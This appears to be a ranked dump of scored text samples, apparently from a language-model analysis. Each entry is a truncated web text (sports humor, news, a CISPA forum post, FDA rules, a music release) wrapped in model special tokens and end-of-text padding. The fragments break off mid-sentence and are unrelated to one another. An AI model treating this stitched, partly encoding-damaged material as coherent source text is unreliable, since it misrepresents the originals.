+ +25. Married, eight children. Prefer frequent travel. + +26. Objective: To have my skills and ethics challenged on a daily basis. + +27. Special skills: Thyping. + +28. My ruthlessness terrorized the competition and can sometimes offend. + +29. I can play well with others. + +30. Personal Goal: To hand-build a classic cottage from the ground up using my father-in +================================================================================ +Rank = 28; Score = 12255232.0 +<|begin_of_text|>Rodrigo Varela/ESPN Images Have you ever seen Stugotz at Hooters? Have you ever seen Stugotz at Hooters? + +Midwest Region + +#1) Kentucky: Jeff Van Gundy - Queen of Hearts + +#2) Kansas: George Karl- Leader of a nudist colony + +#3) Notre Dame: Nene - Looks like a gladiator that will help you slay a tiger then join you as you embark on a quest + +#4) Maryland: J.J. Redick - Sketchy car valet who might take your car for a joy ride + +#5) West Virginia: Mike Dunleavy Jr. - Looks like a generic police sketch + +#6) Butler: Andy Reid - Looks like he waggles his fingers in front of a tray of doughnuts and says, "Don't mind if I do" + +#7) Wichita State: Marcin Gortat - Guy who becomes a YouTube sensation by wrestling bears shirtless + +#8) Cincinnati: Kris Humphries - Looks like a male cheerleader + +#9) Purdue: Russell Wilson - Looks like a male cheerleader + +#10) Indiana: Jerry Sloan - Looks like he washes his hair with a bar of soap + +#11) Texas: David Shaw - Looks like the president in a cable television network drama + +#12) Buffalo: Nick Saban - Guy who runs a lap, looks at his stopwatch and says, "Still go it," while snapping his fingers + +#13) Valparaiso: Frank Vogel - Guy who keeps calling you to hang out and you keep creating excuses not to go + +#14) Northeastern: Trey Wingo - Looks like a guy who owns a funeral home and does late-night infomercials promoting his seasonally discounted rates + +#15) New Mexico State: DeAndre Jordan - Looks like a cartoon moose + +#16) Hampton: Chip Kelly - Looks like the guy who leaves comically low tips to service people, then shoots the finger gun and says, "Don't spend it all in one place" + +#16) Manhattan: Chip Kelly - Looks like the guy who washes his yacht shirtless + +West Region + +#1) Wisconsin: Ron Rivera - Guy who wears a lei for his entire vacation in Hawaii + +#2) Arizona: Jack Del Rio - Stepdad who tries too hard to be called dad + +#3) Baylor: Orel Hershiser - Looks like the father in the picture of +================================================================================ +Rank = 29; Score = 12124160.0 +<|begin_of_text|>Advertisement Here's what your next license will look -- and feel -- like Several new security features being added Share Shares Copy Link Copy + +Changes are coming to your wallet. Massachusetts is making several changes to the look and feel of driver's licenses.Starting on July 24, the Registry of Motor Vehicles will begin issuing licenses with new design and security features. Every license in the state will be upgraded to the new design within five years, as they expire.New features include raised lettering, similar to a credit card, laser perforations, ultraviolet ink and several secure background designs. Background images include the golden dome of the State House, the memorial to Robert Gould Shaw and the Massachusetts 54th Regiment, the state bird and the state flower."The new licenses and ID cards are among the most secure and technologically advanced in all of North America," the RMV said. The security upgrades will also be applied to identification cards, liquor identification cards, junior operator licenses and under 21 driver's licenses.Get the WCVB News App<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 30; Score = 11993088.0 +<|begin_of_text|>Worse than SOPA, CISPA will allow monitoring, censorship, alteration of ANY online communication + +The assaults keep coming like the Terminator, don't they? This one is bipartisan, too. Comes to you from Rep. Mike Rogers (R-MI) and Rep. C.A. �Dutch� Ruppersberger (D-MD). Strongly recommend reading the entire article. + +____________________________________________ + +http://www.digitaltrends.com/web/watch-out-washington-cispa-replaces-sopa-as-internets-enemy-no-1/ + +Watch out, Washington: CISPA replaces SOPA as Internet�s Enemy No. 1 + +By Andrew Couts + +Digital Trends + +....Unveiled to the House by Rep. Mike Rogers (R-MI) and Rep. C.A. �Dutch� Ruppersberger (D-MD) late last year, CISPA is described as a �cybersecurity� bill. It proposes to amend the National Security Act of 1947 to allow for greater sharing of �cyber threat intelligence� between the U.S. government and the private sector, or between private companies. The bill defines �cyber threat intelligence� as any information pertaining to vulnerabilities of, or threats to, networks or systems owned and operated by the U.S. government, or U.S. companies; or efforts to �degrade, disrupt, or destroy� such systems or networks; or the theft or �misappropriation� of any private or government information, including intellectual property. + +.... + +The Electronic Frontier Foundation (EFF) adds that CISPA�s definition of �cybersecurity� is so broad that �it leaves the door open to censor any speech that a company believes would �degrade the network.�� Moreover, the inclusion of �intellectual property� means that companies and the government would have �new powers to monitor and censor communications for copyright infringement.� + +Furthermore, critics warn that CISPA gives private companies the ability to collect and share information about their customers or users with immunity � meaning we cannot sue them for doing so, and they cannot be charged with any crimes. According to the EFF, CISPA �effectively creates a �cybersecurity� exemption to all existing laws.� + +�There are almost no restrictions on what can be collected and how it can be used, provided a company can claim it was motivated by �cybersecurity purposes,�� the EFF continues. �That means a company like Google, Facebook, Twitter, or AT&T could intercept your emails and text +================================================================================ +Rank = 31; Score = 11534336.0 +<|begin_of_text|>Cleveland, OH–The Cleveland Indians today announced pregame festivities for ALCS Game 1 at Progressive Field on Friday, with first pitch set for 8PM. + +The club is encouraging all fans to #RockRed Tribe gear throughout the ALCS to help maintain the Indians incredible home-field advantage against the Blue Jays. The Indians were 53-28 at Progressive Field this season, second-best in baseball, and won two straight against Boston last weekend. + +Postseason coverage on SportsTime Ohio starting with Drennan Live at 6 p.m. Friday and then Indians Live postgame following the final pitch + +Indians Hall of Famer Andre “Thunder” Thornton will throw Friday’s ceremonial first pitch. Thornton hit 214 homers over 10 seasons with the Tribe. + +Gates will open at 6PM, and fans are encouraged to be in their seats by 7:30PM at the latest to enjoy all pregame festivities. + +Each fan will receive a red #RallyTogether towel upon entering Progressive Field. + +Pregame festivities include Tom Hamilton as emcee, Budweiser activation, Cleveland students manning American flag on field during anthem + +The Indians will have a number of festivities for fans prior to Thursday’s game. + +Other festivities include: + +· Tom Hamilton will emcee on-field pregame festivities + +· Veteran local singer Danielle Danburg will sing the American and Canadian national anthems; Dan Polk will sing “God Bless America” during the seventh inning + +· Cleveland Metropolitan School District students and staff will volunteer to man a giant American flag on field for the anthem + +· Color guards from the Army, Navy, Marines, Air Force and Coast Guard will present the colors + +· Budweiser will bring its ‘Bud and Burgers’ trailer to Gateway Plaza, where fans over the age of 21 can enjoy Budweiser products up until game time; Swenson’s Food Truck also will be on hand + +· The “Mike Trivisonno Show” will broadcast live from the main concourse (near The Corner) from 3-7:30PM + +· WMJI will broadcast live from Gateway Plaza from 5-8PM + +· A band will perform live on Gateway Plaza from 5-7:30PM + +· DJ Kyro among activities available in First Energy Heritage Plaza (center field) pregame + +(Cleveland Indians press release)<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 32; Score = 11337728.0 +<|begin_of_text|>Prime Minister Narendra Modi has ‘replaced’ Mahatma Gandhi in the 2017 wall calendar and table diary published by the Khadi Village Industries Commission (KVIC), official sources said on Thursday, as opposition leaders reacted sharply to the move. + +The cover photo of the calendar and diary shows Modi weaving khadi on a large ‘charkha’, in the same classic pose as Gandhiji. In response, the employees of KVIC at its Vile Parle headquarters plan to stage “a silent, soul-cleansing” protest wearing black bands on their mouths, during lunch hour on Thursday. + +Political leaders took a jibe at the Prime Minister for replacing the iconic image of Gandhi, including Delhi chief minister Arvind Kejriwal, Congress vice-president Rahul Gandhi and former AAP member Yogendra Yadav, tweeting about it. + +“Becoming Gandhi requires years of austerities. One cannot become Gandhi by acting to spin the Charkha, this would only ridicule them,” Kejriwal said in a tweet. + +Gandhiji would've welcomed it, also opposed his photo on notes. + +We should welcome it too. Less hypocrisy.https://t.co/q1fVI2RYmA — Yogendra Yadav (@_YogendraYadav) January 12, 2017 + +Rahul too called Modi’s move “the mangalyaan effect”, referring to India’s Mars Orbiter Mission. + +The Mangalyaan effecthttps://t.co/NnkbJ4i7vx — Office of RG (@OfficeOfRG) January 13, 2017 + +While Gandhi’s historic picture weaving khadi on a simple charkha, wearing his trademark loin cloth, is legendary and imprinted in the minds of the masses since generations, Modi comes across in his signature attire of kurta-pyjama-waistcoat, weaving khadi on a slightly modern charkha. + +KVIC chairman Vinai Kumar Saxena said this was “not unusual” and there have been deviations in the past. + +“The entire khadi industry (udyog) is based on Gandhiji’s philosophy, ideas and ideals, he is the soul of KVIC, so there is no question of ignoring him,” Saxena told IANS. + +KVIC calendar & dairy without Gandhiji's pics have been issued earlier too.Spirit is more important than the image.@PMOIndia,@ashokepandit. pic.twitter.com/57ksjFD1LQ — Chairman KVIC (@ +================================================================================ +Rank = 33; Score = 10813440.0 +<|begin_of_text|>Image copyright AFP Image caption Thousands of Catalans took part in the demonstration, held on Catalonia's National Day + +Thousands of Catalans have rallied in Barcelona, Spain, demanding the right to hold a referendum on independence. + +Participants, waving Catalan flags and wearing the flag's red and yellow colours, stood in a V-shape formation, indicating their desire for a vote. + +Protesters were energised by Scotland's forthcoming independence referendum - and many also waved the Scottish flag. + +The regional government has called a referendum for 9 November. The Spanish government says the vote is illegal. + +"We want to decide our future. We don't understand why that is constantly denied," Victor Panyella, a professor taking part in the rally, told Reuters. + +Ana Melendez, another participant, told the BBC she was "jealous" of Scotland, which has a referendum on independence from the rest of the United Kingdom on 18 September. + +Catalonia is one of Spain's richest and most highly industrialised regions, and also one of the most independent-minded. + +Image copyright Reuters Image caption Participants formed a large "V" in central Barcelona + +Image copyright AFP Image caption The Scottish flag could also be glimpsed among the Catalonia flags in the crowd + +Until recently, few Catalans had wanted full independence, but Spain's painful economic crisis has seen a surge in support for separation. + +The national government is opposed to any move towards independence. According to the Spanish constitution, the central government's blessing is required to make a referendum legal. + +At the scene: Tom Burridge, BBC News, Barcelona + +Image copyright AFP + +On Catalonia's national day, or La Diada, as it's called here, a huge crowd formed the thin red and yellow stripes of the Catalan flag, creating a giant 'V' for vote. + +Look closer and you could see an endless number of pro-independence Catalan flags, which have a blue triangle and a silver star. + +There were also a handful of Scottish flags fluttering in the wind. + +Each year, the atmosphere at the La Diada celebrations is electric and it's easy to imagine the event being infectious for some. + +The Catalan national anthem rings out, as do the deafening chants of "independence". People's dogs wear flags and people's faces are painted, party-style, in the Catalan colours. + +The true numbers present in Barcelona today will be disputed, but a large chunk of the Catalan population turned out. + +However another large number did not. The opinion polls are complex depending on the question, but if it's a simple " +================================================================================ +Rank = 34; Score = 10616832.0 +<|begin_of_text|>Version History + +1.8.5: + +1.9: + +1.9.5: + +1.9.5.5: + +1.9.6: + +1.9.7: + +1.9.8: + +1.9.9: + +1.9.9.1: + +2.0: + +2.1: + +2.1.1: + +2.2: + +1.0 Release1.1 Added the LAW and M79, the LAW will replace the RPG sounds1.2 Added the menu sounds as well as the perk level up sound, added the closed beta wave start sound as well some extra sounds on the trader menu and scoreboard, added the classic headshot sounds1.3 Fixed missing pump sounds on the trench gun, fixed missing sounds with the level action rifle1.4 Added the badass Z.E.D. gun to replace the Rail Gun and added the Flamethrower too1.4.5 Quick hotfix about that the flamethrower was missing, thats now fixed1.5 Improved the headshot sounds. Added some better bullet hits sounds. Improved the explosions sounds. Also the classic crawler might return too1.6 Added the thompson to replace the P90, added the classic katana sounds, Added the classic crawler1.7 Added the Pipe Bomb sounds to replace the C4, improved the headshot sound effects1.8 Fixed some missing sounds on the new Tacticool Winchester, Added the KSG sounds to replace the new shotgun, the HZ12- Updated the footstep sounds as well as added landing sounds when jumping (Just like in KF1, wow, i wish they added that to the base game)- Replaced the sounds of the stoner LMG (hope you guys like it)- Removed the xmas gorefast sounds (Because no one likes it)- Added classic's patriach minigun sound and rockets- Changed the melee hit sounds- Replaced the husk weapon sounds to its old ones- Changed the bullet impacts with the ones from KF1- Added the old darts sounds from the medic weapons- Added the old Seeker Six sounds- Replaced the Hemoglobin sounds- Replaced UMP-45 sounds- Fixed headshot sounds- Added the Mac-10- Added the Husk cannon- Added the M99- Added the Quad Shotgun- Fixed the M1911 and MB500 sounds- Replaced the AF2011- Replaced the FNFAL, MKB42 and HMTECH 501Enjoy everyone!- +================================================================================ +Rank = 35; Score = 10616832.0 +<|begin_of_text|>Silver Physical Supplies and Price Action + +The basic tenets of economics tell us that supply, demand, and price as all intertwined, especially in free markets. While the silver market may be not as free as we would like, compared to most, it is relatively free, and it should be very much subject to basic economic laws. + +Last week, I called a number of silver buyers, sellers and coin shops to get an idea of how the market was responding to the massive run up in silver prices. Needless to say, the results weren't exactly as I had expected. I thought that during the run up, shops would report that some of their regular investors had been taking profits. This wasn't the case. + +The Survey + +In what cannot at all be seen as an entirely representative sample, a total of 15 coin shops were phoned and surveyed about their total sales. All but three had seen an increase in sales of junk jewelry metals, as people were cashing out for a variety of reasons, most of which are probably preparing for the holidays. One said he had seen a decrease in junk sales, but admitted he had no hard numbers on which to base his claim. + +The remaining two declined to comment. One suggested that it was a theft risk to release such data. We'll mark that particular shop as busier than normal. + +As for sales of silver, all of the shops who said they were purchasing more junk silver than normal noted that they had, in fact, sold more silver bullion, even as prices rose higher. A few, more than willing to divulge such information, even noted that the regulars were buying more weight, while one-time customers were coming in to raise cash. + +Therefore, from our small study, it can be reasonably concluded that even as prices tear towards the upside, there is little interest among the current physical silver investing community to let go of their silver. Instead, as prices head higher, we, as the good little investors we are, continue to buy more, not less, of the beautiful metals. + +The Irony of Investment Markets + +This is perhaps the irony of the silver markets, or any non-replacement investment market for that matter. As the market heads higher, the supply is not increasing at the retail recycling level or at the production level. Silver miners are not wholly silver miners, and they have to find copper before they can find silver. Therefore, while miners would love to start working overtime to dig silver, supplies ready to be quickly unearthed have yet to be discovered. + +In the long +================================================================================ +Rank = 36; Score = 10223616.0 +<|begin_of_text|>Kim Kardashian West (Josiah Kamau/Getty Images); Taylor Swift (Kevin Mazur/Getty Images); Tomi Lahren (John Scillia/Getty Images); Amy Schumer (Robin Marchant/Getty Images); Hillary Clinton (Disney) + +Becky: (noun) ; a white woman who uses her privilege as a weapon, a ladder or an excuse. Ex : “A random Becky hit me up on Twitter to explain why not all white women are racist.” + +What started as a controversial term for fellatio has blossomed into an all-encompassing term for a specific class of white women. Not all white women are Beckies, but all Beckies are white women. However, just as people note that “black people are not a monolith,” it is unfair to paint the entire genus of Beckies with the same broad brush. + +Advertisement + +To combat this stereotype, we gathered some of the world’s leading board-certified Beckyologists and asked them to classify the disparate classes of Beckies so that we may have a better understanding when we discuss this subject. And after much discussion, our experts came up with five subgroups into which all Beckies can be categorized. + +Rebecca + +This is the standard, off-the shelf Becky with no adornments, around whom the entire world revolves. When “alt-righters” recite the 14 words, “Because the beauty of the white Aryan woman must not perish from the earth,” this is about whom they are talking. This is for whom they made Forever 21. This is for whom they make Pantene hair conditioner. This is for whom they made America. + +Advertisement + +Advertisement + +It is easy to recognize a Rebecca. She can’t understand how anyone could be cruel to a puppy, but turns the channel when they talk about Trayvon Martin. She is gluten-free and eats only free-range chicken, but will call the cops if she spots a “suspicious-looking” hoodie-wearing teenager in her neighborhood. In the South, she often wears dresses and cowboy boots. She sometimes wears Umbros and flip-flops. She always wears privilege. + +Unaware of her Becky-ness, she asks questions born out of privilege, like, “Can I touch your hair?” or “Is this racist?” She loves everybody. She clutches her purse when you get close to her. She writes that Sharonda is “too loud and aggressive” in her employee evaluation. She begins every sentence with “Well, actually... ” She hates the term “Becky.” + +Identifying call: “ +================================================================================ +Rank = 37; Score = 10158080.0 +<|begin_of_text|>On Thursday at the strike of 10 a.m. ET, FXX will drop an absurdly daunting challenge into the laps of channel surfers by airing all 552 episodes of The Simpsons in a row. (In case you’re wondering, two people once made it 86 hours and 37 minutes through a Simpsons marathon before Fox ended the contest in a record-breaking tie.) + +How can you binge 25 seasons of the animated comedy just 12 days, bearing witness to every Homer “Woo hoo!”, Barney belch, and grisly Scratchy disemboweling? Hydration, meal breaks, micro-naps, and multiple empty DVRs will help, for starters. But you also might want to check out these 15 survival tips, given to EW by the writers of The Simpsons. + +15. After every episode, make sure to thank Jebus. + +14. Eat some donuts, smoke some Tomacco, and drink a flaming Moe. + +13. Practice saying “this is when the show started going downhill,” starting midway through the first episode. + +12. DRINKING GAME: Drink a beer every time Homer drinks a beer. + +11. Stretch for at least 20 minutes before doing the Bartman. + +10. Every time Homer and Marge “snuggle,” think how nice it would be if you had any kind of human relationship. + +9. Every time Homer and Marge fight, be thankful you don’t have any kind of human relationship. + +8. WASHINGTON AND COLORADO RESIDENTS ONLY: During Episode 420, you know what to do. + +7. Take a quick break during “Deep Space Homer” to welcome our new insect overlords. + +6. Remember: you can sing along to the Stonecutters song, but you’ll never understand why Steve Guttenberg was a star + +5. Every time Maggie does something cute, think about how you could be spending time with your own children instead of watching the Simpsons marathon. + +4. When Marge takes on something—whether it’s the monorail or cartoon violence—don’t side against her. You’ll be sorry. + +3. If you get depressed midway through the marathon, remember: “You are Lisa Simpson.” (Lisa Simpson only.) + +2. Keep your TV room stocked with alcohol, the cause of (and solution to) all of life’s problems. + +1. Follow Homer’s lead and steal cable—you’ll get the whole marathon for free!<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 38; Score = 10092544.0 +<|begin_of_text|>6. Speaking at a livestock auction barn in Iowa, Hillary Clinton said she expected voters to inspect her, and offered: + +A) “You can look inside my mouth if you want.” + +B) “You can take a gander at my withers.” + +C) “You can examine the stock I came from.” + +7. Ratcheting it up in New Hampshire, Romney charged Giuliani with being: + +A) A person in a glass house who throws stones + +B) A rolling stone who gathers no moss + +C) A twice-divorced, thrice-married ferret-hater + +8. Giuliani retorted that Romney was: + +A) A person in a glass house who throws stones + +B) A rolling stone who gathers no moss + +C) A flip-flopping ferret lover + +9. Somewhere along the line, reporters have noticed, Hillary Clinton dropped: + +A) Bill + +B) The Celine Dion theme song + +C) The black pantsuit + +10. Texas Gov. Rick Perry endorsed Rudy Giuliani by comparing him to: + +A) A great stallion with one sore hoof + +B) A pickup truck with one undesirable option + +C) A great date with bad breath + +Newsletter Sign Up Continue reading the main story Please verify you're not a robot by clicking the box. Invalid email address. Please re-enter. You must select a newsletter to subscribe to. Sign Up You will receive emails containing news content, updates and promotions from The New York Times. You may opt-out at any time. You agree to receive occasional updates and special offers for The New York Times's products and services. Thank you for subscribing. An error has occurred. Please try again later. View all New York Times newsletters. + +11. BEYOND BARBRA AND OPRAH: Match the candidate with the celebrity backer. + +A) “Nature Boy” Ric Flair + +B) Kevin Bacon + +C) Forest Whitaker + +D) The Osmonds + +E) Melissa Gilbert + +F) Merle Haggard + +G) Red Sox pitcher Curt Schilling + +H) Pat Sajak + +I) Sean Penn + +1) Hillary Clinton + +2) Barack Obama + +3) John Edwards + +4) Rudy Giuliani + +5) Dennis Kucinich + +6) Mike Huckabee + +7) Fred Thompson + +8) John McCain + +9) Mitt Romney + +12. When asked if he ever inhaled, Barack Obama said: + +A) “I’m not going to talk about what I did as a child.” + +B) +================================================================================ +Rank = 39; Score = 10027008.0 +<|begin_of_text|>(a) The general principles and factors that the Food and Drug Administration (FDA) considered in arriving at the reference amounts customarily consumed per eating occasion (reference amounts) which are set forth in paragraph (b) of this section, are that: (1) FDA calculated the reference amounts for persons 4 years of age or older to reflect the amount of food customarily consumed per eating occasion by persons in this population group. These reference amounts are based on data set forth in appropriate national food consumption surveys. (2) FDA calculated the reference amounts for an infant or child under 4 years of age to reflect the amount of food customarily consumed per eating occasion by infants up to 12 months of age or by children 1 through 3 years of age, respectively. These reference amounts are based on data set forth in appropriate national food consumption surveys. Such reference amounts are to be used only when the food is specially formulated or processed for use by an infant or by a child under 4 years of age. (3) An appropriate national food consumption survey includes a large sample size representative of the demographic and socioeconomic characteristics of the relevant population group and must be based on consumption data under actual conditions of use. (4) To determine the amount of food customarily consumed per eating occasion, FDA considered the mean, median, and mode of the consumed amount per eating occasion. (5) When survey data were insufficient, FDA took various other sources of information on serving sizes of food into consideration. These other sources of information included: (i) Serving sizes used in dietary guidance recommendations or recommended by other authoritative systems or organizations; (ii) Serving sizes recommended in comments; (iii) Serving sizes used by manufacturers and grocers; and (iv) Serving sizes used by other countries. (6) Because they reflect the amount customarily consumed, the reference amount and, in turn, the serving size declared on the product label are based on only the edible portion of food, and not bone, seed, shell, or other inedible components. (7) The reference amount is based on the major intended use of the food (e.g., milk as a beverage and not as an addition to cereal). (8) The reference amounts for products that are consumed as an ingredient of other foods, but that may also be consumed in the form in which they are purchased (e.g., butter), are based on use in the form purchased. (9) FDA sought to ensure that foods that have similar dietary usage, product characteristics, and customarily consumed +================================================================================ +Rank = 40; Score = 9961472.0 +<|begin_of_text|>Breaking News Emails Get breaking news alerts and special reports. The news and stories that matter, delivered weekday mornings. + +Oct. 23, 2017, 12:39 PM GMT / Updated Oct. 23, 2017, 12:39 PM GMT By Chuck Todd, Mark Murray and Carrie Dann + +First Read is your briefing from Meet the Press and the NBC Political Unit on the day's most important political stories and why they matter. + +GOP wrestles with tax politics — but what about the policy? + +WASHINGTON — On a conference call Sunday afternoon with House Republicans, NBC’s Kasie Hunt reports, President Trump issued this warning: The GOP needs to pass his tax plan or it will lose in the 2018 midterms. + +Failure, he said, would be “really bad” for the party in next year’s elections, while success would be “like skating on ice.” + +But that focus on the tax plan’s electoral politics — when the midterm cake is already being baked — ignores the more important policy questions right now. + +Will the GOP tax plan really RAISE taxes on middle-class and upper-middle-class Americans? Given that the initial plan eliminates personal exemptions (replaced by a larger standard deduction), the nonpartisan Tax Policy Center said one-quarter of American taxpayers would pay higher taxes by 2027, including 30 percent with incomes between $50,000 and $150,000 and 60 percent of those making between $150,000 and $300,000. + +How much will the plan add to the deficit? The Treasury Department announced Friday that the federal budget deficit increased to $666 billion in the just-completed fiscal year – up from $585 billion last year. And that’s significant, because the Tax Policy Center says the GOP tax plan would reduce revenues by $2.4 trillion over the first 10 years (or $240 billion per year). + +How much will the wealthy benefit vs. everyone else? Since the GOP proposal, among other things, eliminates the estate tax and lowers taxes for “pass-through” businesses, the same Tax Policy Center says that more than half of the benefits in the first year go to the Top 1 percent of taxpayers, while 30 percent of the benefits will go to the Top 0.1 percent. + +Are Republicans really going to tax 401k accounts? That has been one of the trial balloons that Republicans have released. “The proposals under discussion would potentially cap the annual amount workers can set aside to as low as $2,400 for 401(k) accounts, +================================================================================ +Rank = 41; Score = 9961472.0 +<|begin_of_text|>Ok here we go, it's the Akumajo Dracula Best Music Collections Box. At two gigabytes and nineteen and a half hours, this beast covers the entire Castlevania series (or close enough). Except to hear a lot of Konami Kukeiha Club and Michiru Yamane, but there's way more artists as well. I've put an enormous amount of time and work into this release, so hopefully it shows. + +Akumajo Dracula Best Music Collections Box + +4/06/2010 Update: No more updates: + +1) Fixed the m3u, nfo and sfv. + +2) Fixed a few tracks that had misspellings on the box. + +3) Fixed the "Encoded" field on a few tracks not displaying properly in Foobar. + +4) Fixed the Disc 18 tracks "Comment" field. + +5) Swapped the titles of tracks 8 and 10 on Disc 4. + +6) Fixed the id3v1 album tags for the tracks in the zip file. + +Make sure you only have 574 tracks plus the three other files. + +You can download the FINAL 1.04 "Toothed Wheel" update here.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_o